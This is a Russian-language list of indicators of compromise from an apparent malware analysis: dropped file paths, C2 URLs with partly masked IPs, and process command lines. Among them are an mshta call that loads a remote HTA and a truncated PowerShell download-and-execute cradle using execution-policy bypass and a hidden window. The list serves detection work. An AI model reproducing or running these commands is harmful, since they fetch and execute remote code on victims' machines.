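Техническая информация
Ниже перечислены индикаторы в том виде, в каком они приведены на странице: пути к файлам, сетевые запросы и командные строки процессов. Часть цифр в IP-адресах заменена символом «#», а командная строка PowerShell обрезана («...»), поэтому эти записи подходят только для поиска по частичному совпадению, а не для точного сопоставления.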
- '%WINDIR%\syswow64\mshta.exe' http://18#.##1.209.47:1010/hta &AAAAAAC
- C:\users\public\tczr.exe
- %TEMP%\nsd1ec2.tmp
- %TEMP%\nsd1ec3.tmp\userinfo.dll
- %APPDATA%\des\k\sticky\yourname\comjepost.cpp
- %APPDATA%\des\k\sticky\yourname\vsaenv.exe
- %APPDATA%\des\k\sticky\yourname\dvfxdochelpb.hxk
- %APPDATA%\des\k\sticky\yourname\writepersistentnets390xvirtio
- %APPDATA%\des\k\sticky\yourname\netcfv2customcontrol.zip
- %APPDATA%\des\k\sticky\yourname\extcon-sm5502.ko
- %APPDATA%\des\k\sticky\yourname\sysinfo.hxc
- %APPDATA%\des\k\sticky\yourname\70.opends60.dll
- %APPDATA%\des\k\sticky\yourname\$onxml
- %APPDATA%\des\k\sticky\yourname\manifest.xml
- %TEMP%\commenttext\if\xrds\local68235603genericscrewdriver.gif
- %TEMP%\commenttext\if\xrds\model120.xml
- %TEMP%\commenttext\if\xrds\refreshd.gif
- http://18#.##1.209.47:1010/hta via 18#.#61.209.47
- http://18#.##1.209.47:1010/get via 18#.#61.209.47
- 'C:\users\public\tczr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://18#....' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' http://18#.##1.209.47:1010/hta &AAAAAAC' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding